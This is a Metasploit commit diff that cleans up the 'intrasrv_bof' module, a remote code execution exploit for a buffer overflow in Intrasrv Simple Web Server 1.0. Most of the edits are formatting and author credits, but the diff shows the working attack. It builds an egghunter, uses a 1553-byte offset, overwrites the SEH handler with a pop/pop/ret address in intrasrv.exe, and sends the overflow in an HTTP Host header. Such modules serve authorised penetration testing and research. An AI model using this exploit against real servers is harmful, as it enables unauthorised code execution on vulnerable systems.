Do final cleanup on intrasrv_bof

jvazquez-r7 · jvazquez-r7 · commit 7981601eb81a · 2013-08-12T22:24:53.000-05:00
diff --git a/modules/exploits/windows/http/intrasrv_bof.rb b/modules/exploits/windows/http/intrasrv_bof.rb
@@ -17,17 +17,17 @@ def initialize(info={})
 		super(update_info(info,
 			'Name'           => "Intrasrv 1.0 Buffer Overflow",
 			'Description'    => %q{
-					This module exploits a boundary condition error in Intrasrv Simple Web
-					Server 1.0. The web interface does not validate the boundaries of an
-					HTTP request string prior to copying the data to an insufficiently large
-					buffer. Successful exploitation leads to arbitrary remote code execution
-					in the context of the application.
+				This module exploits a boundary condition error in Intrasrv Simple Web
+				Server 1.0. The web interface does not validate the boundaries of an
+				HTTP request string prior to copying the data to an insufficiently large
+				buffer. Successful exploitation leads to arbitrary remote code execution
+				in the context of the application.
 			},
 			'License'        => MSF_LICENSE,
 			'Author'         =>
 				[
-					'xis_one@STM Solutions',  #Discovery, PoC
-					'PsychoSpy <neinwechter[at]gmail.com>' #Metasploit
+					'xis_one', # Discovery, PoC
+					'PsychoSpy <neinwechter[at]gmail.com>' # Metasploit
 				],
 			'References'     =>
 				[
@@ -48,7 +48,7 @@ def initialize(info={})
 			'Platform'       => 'win',
 			'Targets'        =>
 				[
-					['v1.0 - XP/2003/Win7',
+					['v1.0 - XP / Win7',
 						{
 							'Offset' => 1553,
 							'Ret'=>0x004097dd #p/p/r - intrasrv.exe
@@ -85,15 +85,15 @@ def check
 	def exploit
 		# setup egghunter
 		hunter,egg = generate_egghunter(payload.encoded, payload_badchars, {
-				:checksum=>true
-			})
+			:checksum=>true
+		})
 
 		# setup buffer
-		buf = rand_text(target['Offset']-126)			# junk to egghunter at jmp -128
-		buf << hunter						# egghunter
-		buf << rand_text(target['Offset']-buf.length)		# more junk to offset
-		buf << "\xeb\x80" + rand_text(2)			# nseh - jmp -128 to egghunter
-		buf << [target.ret].pack("V*") 				# seh
+		buf = rand_text(target['Offset']-126)         # junk to egghunter at jmp -128
+		buf << hunter                                 # egghunter
+		buf << rand_text(target['Offset']-buf.length) # more junk to offset
+		buf << "\xeb\x80" + rand_text(2)              # nseh - jmp -128 to egghunter
+		buf << [target.ret].pack("V*")                # seh
 
 		# second last byte of payload/egg gets corrupted - pad 2 bytes
 		# so we don't corrupt the actual payload
@@ -104,7 +104,7 @@ def exploit
 		# instead of HttpClient here to maximize control over what's sent.
 		# (i.e. no additional headers to mess with the stack)
 		connect
-		sock.put("GET / HTTP/1.0\r\nHost: #{buf}\r\n#{egg}")
+		sock.put("GET / HTTP/1.0\r\nHost: #{buf}\r\n\r\n#{egg}\r\n\r\n")
 		disconnect
 	end
 end
